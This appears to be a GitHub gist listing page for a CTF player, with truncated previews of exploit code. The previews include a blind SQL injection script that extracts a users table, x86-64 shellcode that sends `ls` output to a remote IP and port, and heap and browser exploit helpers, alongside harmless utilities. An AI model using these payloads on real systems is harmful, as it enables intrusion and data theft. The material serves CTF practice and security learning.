Yudai ptr-yudai
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * Utils | |
| */ | |
| let conversion_buffer = new ArrayBuffer(8); | |
| let float_view = new Float64Array(conversion_buffer); | |
| let int_view = new BigUint64Array(conversion_buffer); | |
| BigInt.prototype.hex = function() { | |
| return '0x' + this.toString(16); | |
| }; | |
| BigInt.prototype.i2f = function() { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from ptrlib import * | |
| def new(size, data): | |
| sock.sendlineafter("Exit\n", "1") | |
| sock.recvline() | |
| sock.sendline(str(size)) | |
| sock.recvline() | |
| sock.sendline(data) | |
| def delete(index): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import requests | |
| import json | |
| data = '' | |
| for j in range(7, 0x100): | |
| i = 0 | |
| while i < 8: | |
| payload = { | |
| 'limit': "(SELECT (ASCII(SUBSTRING((SELECT users::text FROM users LIMIT 1 OFFSET 4),{},1)) >> {}) & 1)".format(j, i) |
ptr-yudai
/ exploit.asm
Created
December 24, 2018 14:40
Send the result of `ls` to 192.168.204.6:4444
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; Socket | |
| mov al, 41 | |
| push 2 | |
| pop rdi | |
| push 1 | |
| pop rsi | |
| cdq | |
| syscall | |
| ; Connect | |
| xchg edi, eax |
ptr-yudai
/ lenxpand.py
Last active
August 28, 2018 15:30
Length Extension Attack against MD5 (Python2)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # coding: utf-8 | |
| import struct | |
| # | |
| # MD5 | |
| # | |
| def md5hex(message, iv=(0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476), prevlen=0): | |
| A, B, C, D = md5(message, iv, prevlen) | |
| md5sum = struct.pack('<I', A) | |
| md5sum += struct.pack('<I', B) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import hashlib | |
| import base64 | |
| import re | |
| from secret import FLAG, SALT | |
| def construct(data): | |
| ret = {} | |
| regs = data.split('|') | |
| for reg in regs: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Simple Voice Recorder for TOELF Speaking Test | |
| # Usage: | |
| # python record.py [output.wav] | |
| # Requirement: | |
| # Python 2, arecord (often pre-installed on linux) | |
| # What does this program do? | |
| # First, this program will wait 15 seconds, which is the same length given in the TEFL test for preparing your answer. | |
| # Second, arecord will begin to record your voice for 45 seconds in which you need to answer the question. | |
| # After that, the recorded voice will be saved as a wav file. | |
| # Optionally, you can listen to the recorded voice after your answer. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %{ | |
| #include <stdio.h> | |
| #include "y.tab.h" | |
| int yywrap(void) { return 1; } | |
| %} | |
| %% | |
| "+" return OPERATOR_ADD; | |
| "-" return OPERATOR_SUB; | |
| "*" return OPERATOR_MUL; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # calc.binを出力するコマンド | |
| calc.bin: y.tab.c lex.yy.c # 下のコマンドに必要なファイル | |
| cc -o calc.bin y.tab.c lex.yy.c | |
| # y.tab.cを出力するコマンド | |
| y.tab.c: calc.y # 下のコマンドに必要なファイル | |
| yacc -dv calc.y | |
| # lex.yy.cを出力するコマンド | |
| lex.yy.c: calc.l # 下のコマンドに必要なファイル |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| class tp: | |
| # | |
| # Constructor | |
| # | |
| def __init__(self, host, port): | |
| # Connect to server | |
| self.sock = remote(host, port) | |
| # List of commands |